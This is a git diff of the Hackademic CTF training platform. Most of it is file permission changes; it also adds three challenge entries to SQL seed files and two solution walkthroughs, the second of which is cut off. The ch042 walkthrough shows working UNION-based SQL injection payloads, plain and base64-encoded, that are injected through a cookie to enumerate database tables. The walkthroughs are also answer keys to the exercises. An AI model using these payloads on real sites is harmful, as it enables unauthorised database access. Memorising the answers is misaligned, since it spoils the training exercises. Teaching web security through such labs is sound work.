diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_setfilter.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_setfilter.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_while.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compile_while.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compilebase.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_compilebase.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config_file_compiler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_config_file_compiler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfilelexer.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfilelexer.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfileparser.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_configfileparser.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_data.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_data.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_debug.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_debug.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_filter_handler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_filter_handler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_function_call_handler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_function_call_handler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_get_include_path.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_get_include_path.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_nocache_insert.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_nocache_insert.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_parsetree.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_parsetree.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_eval.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_eval.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_extends.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_extends.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_file.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_file.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_php.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_php.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_registered.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_registered.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_stream.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_stream.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_string.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_resource_string.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_smartytemplatecompiler.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_smartytemplatecompiler.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_template.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_template.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatebase.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatebase.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatecompilerbase.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatecompilerbase.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatelexer.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templatelexer.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templateparser.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_templateparser.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_utility.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_utility.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_write_file.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_internal_write_file.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_custom.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_custom.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_recompiled.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_recompiled.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_uncompiled.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_resource_uncompiled.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.21/libs/sysplugins/smarty_security.php b/extlib/Smarty-3.1.21/libs/sysplugins/smarty_security.php
old mode 100644
new mode 100755
diff --git a/extlib/Smarty-3.1.8/libs/plugins/function.locale.php b/extlib/Smarty-3.1.8/libs/plugins/function.locale.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/AddChallenge.php b/hackademic_devtests/admin/controller/AddChallenge.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/AddUserTest.php.php b/hackademic_devtests/admin/controller/AddUserTest.php.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/ArticleManagerTest.php b/hackademic_devtests/admin/controller/ArticleManagerTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/ChallengeManager.php b/hackademic_devtests/admin/controller/ChallengeManager.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/ClassManagerTest.php b/hackademic_devtests/admin/controller/ClassManagerTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/Scoring.php b/hackademic_devtests/admin/controller/Scoring.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/controller/UserClassesTest.php b/hackademic_devtests/admin/controller/UserClassesTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/model/class.MenuBackendTest.php b/hackademic_devtests/admin/model/class.MenuBackendTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/model/class.OptionsTest.php b/hackademic_devtests/admin/model/class.OptionsTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/admin/model/class.PageBackendTest.php b/hackademic_devtests/admin/model/class.PageBackendTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/class.BaseTest.php b/hackademic_devtests/class.BaseTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/ReadArticle.php b/hackademic_devtests/controller/ReadArticle.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/Solve Challenge.php b/hackademic_devtests/controller/Solve Challenge.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/TryChallenge.php b/hackademic_devtests/controller/TryChallenge.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/View Scores.php b/hackademic_devtests/controller/View Scores.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/class.HackademicControllerTest.php b/hackademic_devtests/controller/class.HackademicControllerTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/controller/implementations/class.HackademicControllerImplementation.php b/hackademic_devtests/controller/implementations/class.HackademicControllerImplementation.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/initTests.php b/hackademic_devtests/initTests.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.ArticleTest.php b/hackademic_devtests/model/common/class.ArticleTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.ChallengeAttemptsTest.php b/hackademic_devtests/model/common/class.ChallengeAttemptsTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.ChallengeTest.php b/hackademic_devtests/model/common/class.ChallengeTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.HackademicDBTest.php b/hackademic_devtests/model/common/class.HackademicDBTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.MenuTest.php b/hackademic_devtests/model/common/class.MenuTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.PageTest.php b/hackademic_devtests/model/common/class.PageTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/model/common/class.PluginTest.php b/hackademic_devtests/model/common/class.PluginTest.php
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/selenium-server-standalone-2.45.0.jar b/hackademic_devtests/selenium-server-standalone-2.45.0.jar
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/selenium/ui/log_in_click_options_enable_disable_plugin_and_theme.html b/hackademic_devtests/selenium/ui/log_in_click_options_enable_disable_plugin_and_theme.html
old mode 100644
new mode 100755
diff --git a/hackademic_devtests/selenium/ui/test_plugin_suite.html b/hackademic_devtests/selenium/ui/test_plugin_suite.html
old mode 100644
new mode 100755
diff --git a/index.php b/index.php
old mode 100644
new mode 100755
diff --git a/installation/index.php b/installation/index.php
old mode 100644
new mode 100755
diff --git a/installation/installer/Installer.php b/installation/installer/Installer.php
old mode 100644
new mode 100755
diff --git a/installation/installer/data/index.php b/installation/installer/data/index.php
old mode 100644
new mode 100755
diff --git a/installation/installer/data/lang/index.php b/installation/installer/data/lang/index.php
old mode 100644
new mode 100755
diff --git a/installation/installer/index.php b/installation/installer/index.php
old mode 100644
new mode 100755
diff --git a/installation/sql/db.sql b/installation/sql/db.sql
old mode 100644
new mode 100755
index 06c24b62..922c2da9
--- a/installation/sql/db.sql
+++ b/installation/sql/db.sql
@@ -87,7 +87,7 @@ INSERT INTO `challenges` (`title`, `pkg_name`, `description`, `author`, `categor
('Challenge 23', 'ch023', '\n \n Ever been to take part in a treasure hint? Here''s your chance.The treasure is hidden somewhere in the web server.Try to use the hints available and reach the treasure. \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:42', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 24', 'ch024', '\n \n You have ordered a product on a website online.But,you found out that the product was defective and so, asked for a refund. But,the website rejected your refund request without any reason. You, being a hacker want to hack into the system and make your refund request accepted. \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web,network', '2015-03-15 23:05:43', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 25', 'ch025', '\n \n Time to hurry! You have mistakenly sent an important mail to the wrong person. The details of the mail are too valuable and you can''t risk them being read by a wrong person.So, hurry up and stop the person from reading the mail.\n Your Email: user234@email.com\n Password: Usr@#$lc \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:44', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
-('Challenge 26', 'ch026', '\n \n You are a member of the National Cyber Security group, along with a friend of yours.\n \n Your friend came across a conversation between 2 people and he suspected it to be related to some fraud. So, he started a Man-In-The-Middle Attack and succesfully installed a new key between them, during the key exchange phase. \n \n Now, he has asked you to spy on this conversation and gave you the details of the keys.He did not give you any information about the encryption scheme being used in the conversation. Its your turn to continue the MIM attack in such a way that none of the parties detect the attack. \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:45', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 26', 'ch026', '\n \n You are a member of the National Cyber Security group, along with a friend of yours.\n \n Your friend came across a conversation between 2 people and he suspected it to be related to some fraud. So , he started a Man-In-The-Middle Attack and succesfully installed a new key between them, during the key exchange phase. \n \n Now, he has asked you to spy on this conversation and gave you the details of the keys.He did not give you any information about the encryption scheme being used in the conversation. Its your turn to continue the MIM attack in such a way that none of the parties detect the attack. \n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:45', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 27', 'ch027', '\n \n The archaeological department has found a book which is hundreds of years old. This book named ''The Treasure'' tells of a treasure of immense value.The book also contains an encrypted text, which might help in finding the key to the treasure. You have been entrusted the responsibility to decipher it.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'crypto', '2015-03-15 23:05:46', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 28', 'ch028', '\n \nYou are again given the task to perform a Man-In-Middle Attack by your Security Agency.This time, both the parties are using the secure Diffie-Hellman Key Exchange protocol for generating keys.You have to perform the MIM attack during this key exchange.You can read about this key exchange protocol\nhere\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:39', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 29', 'ch029', '\n \nThis is a challenge to test your knowledge of Cross Site Request Forgery attacks. Use CSRF attack and get your bank account credited with an amount of 1200 or greater.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:39', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
@@ -101,7 +101,12 @@ INSERT INTO `challenges` (`title`, `pkg_name`, `description`, `author`, `categor
('Challenge 37', 'ch037', '\n \nYou have been using an online calendar service for a long time.Recently, a bug has crept into that service and so,its displaying the wrong date and time.You have saved a lot of events and plans in that website and they all got mapped to some different date and time.The website doesn''t even have a contact-us info to report the bug.See if you can creep into the server and change the settings.\n\n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 38', 'ch038', '\n \nYou have come across a series of encrypted messages exchanged between 2 servers.You suspect these messages to be related to an online fraud. So,to verify these messages,you need the key file. The needed file is key.txt and is located in the web root directory,but you have no permission to access it. Can you access this file and decrypt the message?\n\n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
('Challenge 39', 'ch039', '\n \n XOR cipher is one of the most secure ciphers and provides unconditional security. YOu are now given a task to break this cipher.Find the message corresponding to a xor encrypted cipher text.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'crypto', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
-('Challenge 40', 'ch040', '\n \n Your friend wants to take help from a third party service provider to improve his own website''s security and search engine visibility.He asked you to view that website and certify it to be completely secure.If you find some loophole in the website''s security, use it to log in as the admin.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:41', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL);
+('Challenge 40', 'ch040', '\n \n Your friend wants to take help from a third party service provider to improve his own website''s security and search engine visibility.He asked you to view that website and certify it to be completely secure.If you find some loophole in the website''s security, use it to log in as the admin.\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'web', '2015-03-15 23:05:41', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 41', 'ch041', '\n \n A Friend of your''s is a great football freak, he has newly created a website [ FootbalLovers ] and has challenged you to get the admin privileges to the website by setting up a ctf type challenge. All you have to do is find out the login credentials of the website and login as admin.\n \n \nHints and tips : First thing you will notice is, that this admin page has right click disabled on it (or rather both the clicks). This is a little annoying thing, but some web developers use it to hide their source code and maybe some private images. You would have to bypass this and get your way around to the credentials, maybe hidden or encrypted. There are some more hints as you proceed through the challenge. Here''s one : "Images can reveal way too much". All the Best, don''t lose patience !!\n \n \n \n', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'stegano', '2016-03-8 06:51:22', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 42', 'ch042', '\n \n Government officials have discovered a paid website, which might have illegal activities covering under them, and they have hired you to get the admin login details of this SITE. However, they have solved this to an extent and have MITM''d a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn''t enough to get to the user''s profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.\n \n \nHints and Tips : You have the credentials of a user, but his profile is not accessible due to some restrictions the website has setup''d. "You cannot have access to your profile without OurBrowser, *If you are our customer, you would have our paid browser and you would know how to continue". This does lead to something. Check out the http requests, and more importantly You''re LOGGED in (atleast as a user). Here''s another : Wanna have a Cookie ??\n \n \nreference1\n \n \n \nSetup database HERE \n \n \n', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'cool', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+('Challenge 43', 'ch043', '\n \n A Web Developer has made his best out to secure his website from various injection attacks by using various filters and even thinks that even the best hacker couldn''t break into his site. Prove him wrong. Link : SITE. However, you have been just using the system which has a user already logged in. So, first you have to inject the website to get the admin credentials and then search for the admin login page [You wouldn''t even find the admin page by using a search engine as search bots have been excluded]. Common give it a try, All the Best !!
\n \nHints and Tips :
+Notice the http requests passing between your browser and localhost server. This is the most common type of vulnerability online these days. There has always been a way to bypass filters. \n \n \nreference1reference2 \n \n
Setup database HERE
+\n \n \n \n', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'sqli', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL);
--
-- Table structure for table challenge_attempts
@@ -182,7 +187,10 @@ INSERT INTO class_challenges (challenge_id , class_id , date_created ) VALUE
(7, 1, '2012-08-09 01:01:07'),
(8, 1, '2012-08-09 01:01:07'),
(9, 1, '2012-10-16 22:32:58'),
-(10, 1, '2012-08-09 01:01:07');
+(10, 1, '2012-08-10 01:01:07'),
+(43, 1, '2016-03-10 03:40:01'),
+(44, 1, '2016-03-10 03:40:01'),
+(45, 1, '2016-03-10 03:40:01');
-- --------------------------------------------------------
diff --git a/installation/sql/temp.sql b/installation/sql/temp.sql
old mode 100644
new mode 100755
index d3090e98..c10fb058
--- a/installation/sql/temp.sql
+++ b/installation/sql/temp.sql
@@ -89,7 +89,12 @@ INSERT INTO `challenges` (`id`, `title`, `pkg_name`, `description`, `author`, `c
(9, 'Challenge 9', 'ch009', 'A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried \r\n\r\nregarding the security of the news that gets posted on the blog and has asked you to check \r\n\r\nhow secure it is.
Your objective is to determine whether any vulnerabilities \r\n\r\nexist that, if exploited, can grant access to the blog''s server.
Hint: A \r\n\r\nspecially-tailored backdoor shell can be found at "http://www.really_nasty_hacker.com/shell.txt".', 'Andreas Venieris,\n \r\n\r\nKonstantinos Papapanagiotou,\n Anastasios Stasinopoulos,\n Vasilios Vlachos,\r\n\r\n\n Alexandros Papanikolaou', 'web', '2012-08-09 00:31:31', 'public', 1, NULL, '1', 60, NULL, NULL, 'public', 1, 60),
(10, 'Challenge 10', 'ch010', 'Would you like to become an active hacker ? How about \r\n\r\nbecoming a member of the world''s largest hacker group: The n1nJ4.n4x0rZ.CreW! \r\n\r\n Before you can join though, you ''ll have to prove yourself worthy by passing the \r\n\r\ntest that can be found at: http://n1nj4h4x0rzcr3w.com
If you succeed in completing the challenge, \r\n\r\nyou will get a serial number, which you will use for obtaining the password that will \r\n\r\nenable you to join the group.
Your objective is to bypass the authentication \r\n\r\nmechanism, find the serial number and be supplied with your own username and password from \r\n\r\n the admin team of the site.', 'Andreas Venieris,\n Konstantinos Papapanagiotou,\n \r\n\r\n Anastasios Stasinopoulos,\n Vasilios Vlachos,\n Alexandros \r\n\r\nPapanikolaou', 'web', '2012-08-09 00:32:07', 'public', 1, NULL, '1', 60, NULL, NULL, 'public', 1, 60),
(11, 'Example Template For Challenge xml Files creation', 'example', '
Insert some text describing the scenario of the challenge(what the users are supposed to do and if there is any fictional story)
', 'Name or email or both', 'In what category does your challenge belong?(web? crypto? networks?)', '2012-10-16 22:35:01', 'private', 0, NULL, '1', 60, NULL, NULL, 'private', 1, 0),
-(12, 'cookiEng', 'cookiEng', '
Hello, we have heard that you are one of the best hackers in our country. We need your services. You must visit an underground site and find the right password. With this password we will cancel 100k+ illegal gun and drug deals!\n The good news are that we have the directory where the password is stored. Its here \\"/t0psec\\".\n The bad news are that we have no access there. Only the administrator does. Go and find the password for us!
Hello, we have heard that you are one of the best hackers in our country. We need your services. You must visit an underground site and find the right password. With this password we will cancel 100k+ illegal gun and drug deals!\n The good news are that we have the directory where the password is stored. Its here \\"/t0psec\\".\n The bad news are that we have no access there. Only the administrator does. Go and find the password for us!
Good luck!
', 'Nikos Danopoulos', 'web', '2012-08-09 00:32:07', 'public', 1, NULL, '1', 60, NULL, NULL, 'public', 1, 60),
+(43, 'Challenge 41', 'ch041', '\n \n A Friend of your''s is a great football freak, he has newly created a website [ FootbalLovers ] and has challenged you to get the admin privileges to the website by setting up a ctf type challenge. All you have to do is find out the login credentials of the website and login as admin.\n \n \nHints and tips : First thing you will notice is, that this admin page has right click disabled on it (or rather both the clicks). This is a little annoying thing, but some web developers use it to hide their source code and maybe some private images. You would have to bypass this and get your way around to the credentials, maybe hidden or encrypted. There are some more hints as you proceed through the challenge. Here''s one : "Images can reveal way too much". All the Best, don''t lose patience !!\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n ', 'stegano', '2016-03-8 06:51:22', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+(44, 'Challenge 42', 'ch042', '\n \n Government officials have discovered a paid website, which might have illegal activities covering under them, and they have hired you to get the admin login details of this SITE. However, they have solved this to an extent and have MITM''d a regular user to get the following credentials { username : scrtusr & password : mint_cinnamon} however this bit of information isn''t enough to get to the user''s profile or to inject into the website to get admin login details . So, now you have to find out the admin credentials and hand it over to the government officials, so that they can carry out some security checks. Login as admin.\n \n \nHints and Tips : You have the credentials of a user, but his profile is not accessible due to some restrictions the website has setup''d. "You cannot have access to your profile without OurBrowser, *If you are our customer, you would have our paid browser and you would know how to continue". This does lead to something. Check out the http requests, and more importantly You''re LOGGED in (atleast as a user). Here''s another : Wanna have a Cookie ??\n \n reference1\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'cool', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL),
+(45, 'Challenge 43', 'ch043', '\n \n A Web Developer has made his best out to secure his website from various injection attacks by using various filters and even thinks that even the best hacker couldn''t break into his site. Prove him wrong. Link : SITE. However, you have been just using the system which has a user already logged in. So, first you have to inject the website to get the admin credentials and then search for the admin login page [You wouldn''t even find the admin page by using a search engine as search bots have been excluded]. Common give it a try, All the Best !!
\n \nHints and Tips :
+Notice the http requests passing between your browser and localhost server. This is the most common type of vulnerability online these days. There has always been a way to bypass filters. reference1reference2
+]]>\n \n ', '\n Bhanudev Chaluvadi\n Spyros Gasteratos\n Rajat Moury\n', 'sqli', '2015-03-15 23:05:40', 'public', 1, NULL, '', 0, NULL, NULL, 'public', NULL, NULL);
-- --------------------------------------------------------
diff --git a/locale/en/LC_MESSAGES/messages.mo b/locale/en/LC_MESSAGES/messages.mo
old mode 100644
new mode 100755
diff --git a/locale/en/LC_MESSAGES/messages.po b/locale/en/LC_MESSAGES/messages.po
old mode 100644
new mode 100755
diff --git a/locale/fr/french.pot b/locale/fr/french.pot
old mode 100644
new mode 100755
diff --git a/misc_scripts/add_Guest_to_every_class.php b/misc_scripts/add_Guest_to_every_class.php
old mode 100644
new mode 100755
diff --git a/misc_scripts/mass_add_challenge.php b/misc_scripts/mass_add_challenge.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Challenge.php b/model/common/class.Challenge.php
old mode 100644
new mode 100755
diff --git a/model/common/class.ChallengeAttempts.php b/model/common/class.ChallengeAttempts.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Menu.php b/model/common/class.Menu.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Page.php b/model/common/class.Page.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Plugin.php b/model/common/class.Plugin.php
old mode 100644
new mode 100755
diff --git a/model/common/class.RegexSolution.php b/model/common/class.RegexSolution.php
old mode 100644
new mode 100755
diff --git a/model/common/class.ScoringRule.php b/model/common/class.ScoringRule.php
old mode 100644
new mode 100755
diff --git a/model/common/class.UserScore.php b/model/common/class.UserScore.php
old mode 100644
new mode 100755
diff --git a/model/common/class.Utils.php b/model/common/class.Utils.php
old mode 100644
new mode 100755
diff --git a/pages/index.php b/pages/index.php
old mode 100644
new mode 100755
diff --git a/solution/ch041_solution.txt b/solution/ch041_solution.txt
new file mode 100755
index 00000000..ffd28613
--- /dev/null
+++ b/solution/ch041_solution.txt
@@ -0,0 +1,38 @@
+Challenge 041 : Easy CTF Login challenge
+
+The first thing one would notice is, right click is disabled on this admin page, one can either use the shortcut to veiw soirce, or some extenstions or tools like web developer etc.
+
+once you view the source, it shows ""
+
+Right click has been disabled which you've gone through.
+If you look carefully, you will notice that the view source page is quite lengthy
+So scroll your way down towards the end. there's the source code.
+These tricks are commonly used by some web developers to hide source code.
+
+Everything looks normal on the code, normal post login form..
+"action=pwd.php"
+let's check this out --> invalid username password, ok so this is not the vulnerability.
+
+In style.css file u get "images/football2.jpg"
+but images/ dir is protected
+
+Try going through all the files in source code, precisely more suspicious file..
+If you get a closer look at it,
+there's this image.jpg file wen you view that, you notice that it's not used anywhere else so far in our site
+so this might be of some help.
+
+Looks like a normal image, but is it?
+Everything that shines is not Gold.
+
+Lets save this image and check the type of file, this is correct : jpeg file
+lets view the contents of file using hexeditor or strings
+
+When one views it, you 'll notice something like this " YWRtaW4= : QGRtIW4hJDRSQDQwUg=="
+towards end.. which pretty much looks like username:password
+
+This sure looks encoded, one would get that from experience that it's one of the most common encrypted format i.e. Base64 encoded
+Hence decode both strings and login with the credentials
+
+Successful !!!
+
+Hope You Learned Some new things and Enjoyed this Challenge !!!
diff --git a/solution/ch042_solution.txt b/solution/ch042_solution.txt
new file mode 100755
index 00000000..d7b0fcdc
--- /dev/null
+++ b/solution/ch042_solution.txt
@@ -0,0 +1,58 @@
+Challenge 042 : Medium Spy Admin Challenge
+
+Welcome to this interesting challenge.
+login form --> let's try sql injection various methods : neither of them works
+there might be a reason you've been given a user credentials
+It looks like a simple website.. let's login with the given username and password.
+
+Looks suspicious..
+"Our Customer" "Paid Browser" --> "OurBrowser"
+
+The Customers have been secretised to used some specific paid browser
+Let's check out by changing our UserAgent to "OurBrowser"
+u can create this using User Agent addon or tamper request using tamper data or burpsuite
+
+Now u have access to ur profile
+it shows username and some call id.
+
+which might be coming from database.
+lets try injecting some queries into different injection fields.. such as along with user agent.
+lets check out our cookies
+
+the content looks something like c2NydHVzcg%3D%3D %3D = "="
+c2NydHVzcg==
+
+this sure is base64 encoded.. let's decode this : scrtusr
+this is the username we have logged in as
+OKAY !! the cookie has content as username which is being encoded as base64
+so let's try base64 encoded (admin).. might work :)
+
+admin : YWRtaW4=
+Nice Try :P
+
+so let's try something else :
+let's try to inject this field as : base64[scrtusr'] : c2NydHVzcic=
+save the cookie
+wow.. it gives : you almost got it.. so surely this part is injectable.. let's try another queries as scrtusr' or scrtusr" with base64 encoding
+and with some time u'll come to know that the query is balanced using ')
+
+') order by 4-- - : gives unknown column 4
+so no. of columns is 3
+
+let's base 64 encode this : ') union all select 1,2,3 -- - and inject in our cookie
+
+so we get the vulnerable column i.e. 2
+so let's inject this completely using error sql injection
+
+') union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- -
+JykgdW5pb24gYWxsIHNlbGVjdCAxLGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSAtLSAt
+
+gives tables : emails and users
+
